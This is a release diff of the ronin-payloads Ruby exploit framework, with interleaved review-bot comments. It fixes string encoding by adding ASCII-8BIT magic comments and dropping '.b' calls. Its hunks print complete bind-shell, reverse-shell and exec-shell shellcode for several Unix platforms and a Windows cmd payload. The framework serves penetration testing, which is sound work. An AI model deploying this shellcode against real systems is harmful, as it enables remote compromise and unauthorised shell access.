ronin-payloads 0.1.5 → 0.1.6

Files changed (30) hide show
  1. checksums.yaml +4 -4
  2. data/.rubocop.yml +3 -0
  3. data/ChangeLog.md +7 -0
  4. data/README.md +1 -0
  5. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
  6. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
  7. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
  8. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
  9. data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
  10. data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
  11. data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
  12. data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
  13. data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
  14. data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
  15. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
  16. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
  17. data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
  18. data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
  19. data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
  20. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
  21. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
  22. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
  23. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
  24. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
  25. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
  26. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
  27. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
  28. data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
  29. data/lib/ronin/payloads/version.rb +1 -1
  30. metadata +2 -2
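--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: 23ed6234ba68bb63d9e7e909987b1b4c3b5f8f75048cb9cef20c61d2a5769bcc
-data.tar.gz: de32a35122ac1e6452b3d1a0148fcb0d4089a9fefa951084cc51cd36bd27c98c
+metadata.gz: 97fb8be02023f3bdaf5ef16711bf1192a574ee10b00a46912c964b01e8577012
+data.tar.gz: a3eb94423e154cd03df538b3883f58de6c166dc7ba7a8f6da077f192f9c66b44
 SHA512:
-metadata.gz: b5dfda82e5c0fcda3da9d48093921b5bcc6935460f9a6bc434b0891a60bfb08995526a3b39f540d6515faddcfc6d882d7f3f27cb64107300c1bbc0e575f43c3b
-data.tar.gz: 5457d1110e9cd8b544e95cdb890a0d135e6e01b3a4f6b7e3fedacdd84bf9cb12005ee695a6b5b6061d824f3f631c31d75b4a1fd44aabe2f8a343b1cd6fab9c93
+metadata.gz: c4d865c10c583da8a38aea5bb79f39f1165d15dd54e09594a2a557a4880058d7c6bd6f5411f382f9a49386cd2fc36ada45868a7001135ebc742613c9d732a359
+data.tar.gz: 795417f0c54ae31283be366941b1f703f67fc3d7cfae9cd13f634b89323b2119e0389cc433638514296327a93f4efdfdad5d63c6458eb46fdb3a5be8f4a192a6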
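--- a/data/.rubocop.yml
+++ b/data/.rubocop.yml
@@ -40,3 +40,6 @@ Style/RedundantLineContinuation:
 Layout/LineContinuationSpacing:
 Exclude:
 - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'
+Style/StringConcatenation:
+Exclude:
+- 'lib/ronin/payloads/builtin/shellcode/**/*.rb'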
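--- a/data/ChangeLog.md
+++ b/data/ChangeLog.md
@@ -1,3 +1,10 @@
+### 0.1.6 / 2024-07-01
+
+#### Payloads
+
+* Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
+building shellcode payloads with certain IP addresses or port numbers.
+
 ### 0.1.5 / 2024-06-19
 
 * Fixed order of arguments passed to `TCPServer.new` in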
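--- a/data/README.md
+++ b/data/README.md
@@ -213,6 +213,7 @@ $ git push
 Define a `/bin/sh` shellcode payload:
 
 ```ruby
+# encoding: ASCII-8BIT
 require 'ronin/payloads/shellcode_payload'
 
 module Ronin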
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
58
59
  "\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
59
60
  "\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
60
61
  "\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
61
- "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23".b
62
+ "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
62
63
  end
63
64
 
64
65
  end
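Review bot: Dropping the trailing `.b` changes the frozenness of `@payload`, not only its encoding: under `# frozen_string_literal: true` (new line 2) the adjacent-literal string assigned here is a frozen literal, whereas `String#b` returned a fresh, unfrozen copy, so any later in-place mutation of the payload (an encoder using `<<` or `gsub!`, for example) would now raise `FrozenError` where it previously worked. The same applies to every other `\`-continued payload in this diff that lost its `.b` (the remaining freebsd, linux/arm, linux/mips, linux/ppc, linux/x86, linux/x86_64, macos, netbsd and openbsd sections), but not to the `+`-concatenated ones, since `+` returns a new string, nor (on Ruby 3+) to the interpolated arm reverse shell. If the payload is never meant to be mutated, a spec iterating the builtin shellcode payloads and asserting `payload.encoding == Encoding::ASCII_8BIT` would lock in the magic-comment approach; otherwise keep a `.dup` on the literal. This section carries no file header, so by the file list it appears to be the freebsd/x86 bind_shell.rb; the `build` method begins outside the hunk.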
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
53
54
  def build
54
55
  @payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
55
56
  "\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
56
- "\x54\x53\xb0\x3b\x50\xcd\x80".b
57
+ "\x54\x53\xb0\x3b\x50\xcd\x80"
57
58
  end
58
59
 
59
60
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -56,7 +57,7 @@ module Ronin
56
57
  "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
57
58
  "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
58
59
  "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
59
- "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80".b
60
+ "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
60
61
  end
61
62
 
62
63
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
53
54
  def build
54
55
  @payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
55
56
  "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
56
- "\x54\x5f\x52\x57\x54\x5e\x0f\x05".b
57
+ "\x54\x5f\x52\x57\x54\x5e\x0f\x05"
57
58
  end
58
59
 
59
60
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -119,7 +120,7 @@ module Ronin
119
120
  "\x08\x00\x8d\xe2" \
120
121
  "\x00\x10\x8d\xe2" \
121
122
  "\x04\x20\x8d\xe2" \
122
- "\x0b\x00\x90\xef".b
123
+ "\x0b\x00\x90\xef"
123
124
  end
124
125
 
125
126
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xc2\x51\x03\x37" \
61
62
  "\x01\xdf\x2f\x62" \
62
63
  "\x69\x6e\x2f\x2f" \
63
- "\x73\x68".b
64
+ "\x73\x68"
64
65
  end
65
66
 
66
67
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -72,7 +73,7 @@ module Ronin
72
73
  "#{packed_port}" \
73
74
  "#{packed_ipv4}" \
74
75
  \
75
- "/bin/sh\0".b
76
+ "/bin/sh\0"
76
77
  end
77
78
 
78
79
  end
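Review bot: This hunk only fixes the reported `Encoding::CompatibilityError` if `packed_port` and `packed_ipv4` are themselves ASCII-8BIT (or pure-ASCII) strings: with the file now read as ASCII-8BIT the surrounding literal is binary, so interpolating a UTF-8 value that holds bytes above 0x7f would still raise the exception the changelog says this release fixes. Both helpers are defined outside the hunk, so I cannot confirm how they are built; if they come from `Array#pack` they are already binary and this is fine. A regression spec that builds this payload with a constructed address and port whose packed bytes all exceed 0x7f (e.g. `255.255.255.255` / `65535`) and asserts `payload.encoding == Encoding::ASCII_8BIT` would pin that down. The `build` method starts before the hunk.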
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -118,7 +119,7 @@ module Ronin
118
119
  "\xf0\xff\xa5\x23" \
119
120
  "\xab\x0f\x02\x24" \
120
121
  "\x0c\x01\x01\x01" \
121
- "/bin/sh".b
122
+ "/bin/sh"
122
123
  end
123
124
 
124
125
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,18 +52,18 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x28\x06\xff\xff".b + # slti a2,zero,-1
55
- "\x3c\x0f\x2f\x2f".b + # lui t7,0x2f2f
56
- "\x35\xef\x62\x69".b + # ori t7,t7,0x6269
57
- "\xaf\xaf\xff\xf4".b + # sw t7,-12(sp)
58
- "\x3c\x0e\x6e\x2f".b + # lui t6,0x6e2f
59
- "\x35\xce\x73\x68".b + # ori t6,t6,0x7368
60
- "\xaf\xae\xff\xf8".b + # sw t6,-8(sp)
61
- "\xaf\xa0\xff\xfc".b + # sw zero,-4(sp)
62
- "\x27\xa4\xff\xf4".b + # addiu a0,sp,-12
63
- "\x28\x05\xff\xff".b + # slti a1,zero,-1
64
- "\x24\x02\x0f\xab".b + # li v0,4011
65
- "\x01\x01\x01\x0c".b # syscall 0x40404
55
+ @payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
56
+ "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
57
+ "\x35\xef\x62\x69" + # ori t7,t7,0x6269
58
+ "\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
59
+ "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
60
+ "\x35\xce\x73\x68" + # ori t6,t6,0x7368
61
+ "\xaf\xae\xff\xf8" + # sw t6,-8(sp)
62
+ "\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
63
+ "\x27\xa4\xff\xf4" + # addiu a0,sp,-12
64
+ "\x28\x05\xff\xff" + # slti a1,zero,-1
65
+ "\x24\x02\x0f\xab" + # li v0,4011
66
+ "\x01\x01\x01\x0c" # syscall 0x40404
66
67
  end
67
68
 
68
69
  end
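Review bot: The `+` chain kept in this `build` (and in the linux/ppc, linux/x86_64, openbsd/x86 and windows/x86_64 sections below) allocates a new intermediate string for every instruction on each call and is the reason this release also has to exclude `Style/StringConcatenation` in .rubocop.yml, while the sibling payloads use adjacent literals joined with `\`. If the per-instruction comments are the only reason for `+`, an array of the same literals — `@payload = [`, `"\x28\x06\xff\xff", # slti a2,zero,-1`, … `].join` — keeps every annotation, builds the payload in one allocation and needs no cop exclusion; `join` of binary elements should yield a binary string, so the encoding fix is unaffected. The whole method is visible in the hunk, but its class header is not; this section has no file header and by the file list appears to be the linux/mips exec_shell.rb.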
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -100,7 +101,7 @@ module Ronin
100
101
  "\x27\xa4\xff\xf4" \
101
102
  "\x28\x05\xff\xff" \
102
103
  "\x24\x02\x0f\xab" \
103
- "\x01\x01\x01\x0c".b
104
+ "\x01\x01\x01\x0c"
104
105
  end
105
106
 
106
107
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,20 +52,20 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x7c\x3f\x0b\x78".b + # mr r31,r1
55
- "\x7c\xa5\x2a\x79".b + # xor. r5,r5,r5
56
- "\x42\x40\xff\xf9".b + # bdzl+ 10000454< main>
57
- "\x7f\x08\x02\xa6".b + # mflr r24
58
- "\x3b\x18\x01\x34".b + # addi r24,r24,308
59
- "\x98\xb8\xfe\xfb".b + # stb r5,-261(r24)
60
- "\x38\x78\xfe\xf4".b + # addi r3,r24,-268
61
- "\x90\x61\xff\xf8".b + # stw r3,-8(r1)
62
- "\x38\x81\xff\xf8".b + # addi r4,r1,-8
63
- "\x90\xa1\xff\xfc".b + # stw r5,-4(r1)
64
- "\x3b\xc0\x01\x60".b + # li r30,352
65
- "\x7f\xc0\x2e\x70".b + # srawi r0,r30,5
66
- "\x44\xde\xad\xf2".b + # .long 0x44deadf2
67
- "/bin/shZ".b # the last byte becomes NULL
55
+ @payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
56
+ "\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
57
+ "\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
58
+ "\x7f\x08\x02\xa6" + # mflr r24
59
+ "\x3b\x18\x01\x34" + # addi r24,r24,308
60
+ "\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
61
+ "\x38\x78\xfe\xf4" + # addi r3,r24,-268
62
+ "\x90\x61\xff\xf8" + # stw r3,-8(r1)
63
+ "\x38\x81\xff\xf8" + # addi r4,r1,-8
64
+ "\x90\xa1\xff\xfc" + # stw r5,-4(r1)
65
+ "\x3b\xc0\x01\x60" + # li r30,352
66
+ "\x7f\xc0\x2e\x70" + # srawi r0,r30,5
67
+ "\x44\xde\xad\xf2" + # .long 0x44deadf2
68
+ "/bin/shZ" # the last byte becomes NULL
68
69
  end
69
70
 
70
71
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -125,7 +126,7 @@ module Ronin
125
126
  "\x3b\xc0\x01\x60" \
126
127
  "\x7f\xc0\x2e\x70" \
127
128
  "\x44\xde\xad\xf2" \
128
- "/bin/shZ".b
129
+ "/bin/shZ"
129
130
  end
130
131
 
131
132
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -98,7 +99,7 @@ module Ronin
98
99
  "\x68\x2f\x62\x69\x6e" \
99
100
  "\x89\xe3" \
100
101
  "\xb0\x0b" \
101
- "\xcd\x80".b
102
+ "\xcd\x80"
102
103
  end
103
104
 
104
105
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -54,7 +55,7 @@ module Ronin
54
55
  def build
55
56
  @payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
56
57
  "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
57
- "\x80".b
58
+ "\x80"
58
59
  end
59
60
 
60
61
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -62,7 +63,7 @@ module Ronin
62
63
  "\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
63
64
  "\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
64
65
  "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
65
- "\x80".b
66
+ "\x80"
66
67
  end
67
68
 
68
69
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -59,7 +60,7 @@ module Ronin
59
60
  "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
60
61
  "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
61
62
  "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
62
- "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05".b
63
+ "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
63
64
  end
64
65
 
65
66
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,16 +52,16 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x48\x31\xd2".b + # xor %rdx, %rdx
55
- "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68".b + # mov $0x68732f6e69622f2f, %rbx
56
- "\x48\xc1\xeb\x08".b + # shr $0x8, %rbx
57
- "\x53".b + # push %rbx
58
- "\x48\x89\xe7".b + # mov %rsp, %rdi
59
- "\x50".b + # push %rax
60
- "\x57".b + # push %rdi
61
- "\x48\x89\xe6".b + # mov %rsp, %rsi
62
- "\xb0\x3b".b + # mov $0x3b, %al
63
- "\x0f\x05".b # syscall
55
+ @payload = "\x48\x31\xd2" + # xor %rdx, %rdx
56
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
57
+ "\x48\xc1\xeb\x08" + # shr $0x8, %rbx
58
+ "\x53" + # push %rbx
59
+ "\x48\x89\xe7" + # mov %rsp, %rdi
60
+ "\x50" + # push %rax
61
+ "\x57" + # push %rdi
62
+ "\x48\x89\xe6" + # mov %rsp, %rsi
63
+ "\xb0\x3b" + # mov $0x3b, %al
64
+ "\x0f\x05" # syscall
64
65
  end
65
66
 
66
67
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
58
59
  "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
59
60
  "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
60
61
  "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
61
- "\x5f\x6a\x3b\x58\x0f\x05".b
62
+ "\x5f\x6a\x3b\x58\x0f\x05"
62
63
  end
63
64
 
64
65
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -55,7 +56,7 @@ module Ronin
55
56
  @payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
56
57
  "\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
57
58
  "\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
58
- "\x6e\x2f\x2f\x73\x68".b
59
+ "\x6e\x2f\x2f\x73\x68"
59
60
  end
60
61
 
61
62
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
61
62
  "\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
62
63
  "\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
63
- "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05".b
64
+ "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
64
65
  end
65
66
 
66
67
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -74,7 +75,7 @@ module Ronin
74
75
  "\x01\x01\x01\x01" \
75
76
  "\x02\x02\x02\x02" \
76
77
  "\x03\x03\x03\x03" \
77
- "\x9a\x04\x04\x04\x04\x07\x04".b
78
+ "\x9a\x04\x04\x04\x04\x07\x04"
78
79
  end
79
80
 
80
81
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
61
62
  "\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
62
63
  "\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
63
- "\x73\x68\x41\x90".b
64
+ "\x73\x68\x41\x90"
64
65
  end
65
66
 
66
67
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,18 +53,18 @@ module Ronin
52
53
  # Builds the shellcode.
53
54
  #
54
55
  def build
55
- @payload = "\x99".b + # cltd
56
- "\x52".b + # push %edx
57
- "\x68\x6e\x2f\x73\x68".b + # push $0x68732f6e
58
- "\x68\x2f\x2f\x62\x69".b + # push $0x69622f2f
59
- "\x89\xe3".b + # mov %esp,%ebx
60
- "\x52".b + # push %edx
61
- "\x54".b + # push %esp
62
- "\x53".b + # push %ebx
63
- "\x53".b + # push %ebx
64
- "\x6a\x3b".b + # push $0x3b
65
- "\x58".b + # pop %eax
66
- "\xcd\x80".b # int $0x80
56
+ @payload = "\x99" + # cltd
57
+ "\x52" + # push %edx
58
+ "\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
59
+ "\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
60
+ "\x89\xe3" + # mov %esp,%ebx
61
+ "\x52" + # push %edx
62
+ "\x54" + # push %esp
63
+ "\x53" + # push %ebx
64
+ "\x53" + # push %ebx
65
+ "\x6a\x3b" + # push $0x3b
66
+ "\x58" + # pop %eax
67
+ "\xcd\x80" # int $0x80
67
68
  end
68
69
 
69
70
  end
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,26 +53,26 @@ module Ronin
52
53
  # Builds the shellcode.
53
54
  #
54
55
  def build
55
- @payload = "\x31\xC9".b + # xor ecx,ecx
56
- "\x64\x8B\x71\x30".b + # mov esi,[fs:ecx+0x30]
57
- "\x8B\x76\x0C".b + # mov esi,[esi+0xc]
58
- "\x8B\x76\x1C".b + # mov esi,[esi+0x1c]
59
- "\x8B\x36".b + # mov esi,[esi]
60
- "\x8B\x06".b + # mov eax,[esi]
61
- "\x8B\x68\x08".b + # mov ebp,[eax+0x8]
62
- "\xEB\x20".b + # jmp short 0x35
63
- "\x5B".b + # pop ebx
64
- "\x53".b + # push ebx
65
- "\x55".b + # push ebp
66
- "\x5B".b + # pop ebx
67
- "\x81\xEB\x11\x11\x11\x11".b + # sub ebx,0x11111111
68
- "\x81\xC3\xDA\x3F\x1A\x11".b + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
69
- "\xFF\xD3".b + # call ebx
70
- "\x81\xC3\x11\x11\x11\x11".b + # add ebx,0x11111111
71
- "\x81\xEB\x8C\xCC\x18\x11".b + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
72
- "\xFF\xD3".b + # call ebx
73
- "\xE8\xDB\xFF\xFF\xFF".b + # call dword 0x15
74
- "\x63\x6d\x64".b # db "cmd"
56
+ @payload = "\x31\xC9" + # xor ecx,ecx
57
+ "\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
58
+ "\x8B\x76\x0C" + # mov esi,[esi+0xc]
59
+ "\x8B\x76\x1C" + # mov esi,[esi+0x1c]
60
+ "\x8B\x36" + # mov esi,[esi]
61
+ "\x8B\x06" + # mov eax,[esi]
62
+ "\x8B\x68\x08" + # mov ebp,[eax+0x8]
63
+ "\xEB\x20" + # jmp short 0x35
64
+ "\x5B" + # pop ebx
65
+ "\x53" + # push ebx
66
+ "\x55" + # push ebp
67
+ "\x5B" + # pop ebx
68
+ "\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
69
+ "\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
70
+ "\xFF\xD3" + # call ebx
71
+ "\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
72
+ "\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
73
+ "\xFF\xD3" + # call ebx
74
+ "\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
75
+ "\x63\x6d\x64" # db "cmd"
75
76
  end
76
77
 
77
78
  end
@@ -22,6 +22,6 @@
22
22
  module Ronin
23
23
  module Payloads
24
24
  # ronin-payloads version
25
- VERSION = '0.1.5'
25
+ VERSION = '0.1.6'
26
26
  end
27
27
  end
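--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: ronin-payloads
 version: !ruby/object:Gem::Version
-version: 0.1.5
+version: 0.1.6
 platform: ruby
 authors:
 - Postmodern
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2024-06-20 00:00:00.000000000 Z
+date: 2024-07-03 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: ronin-support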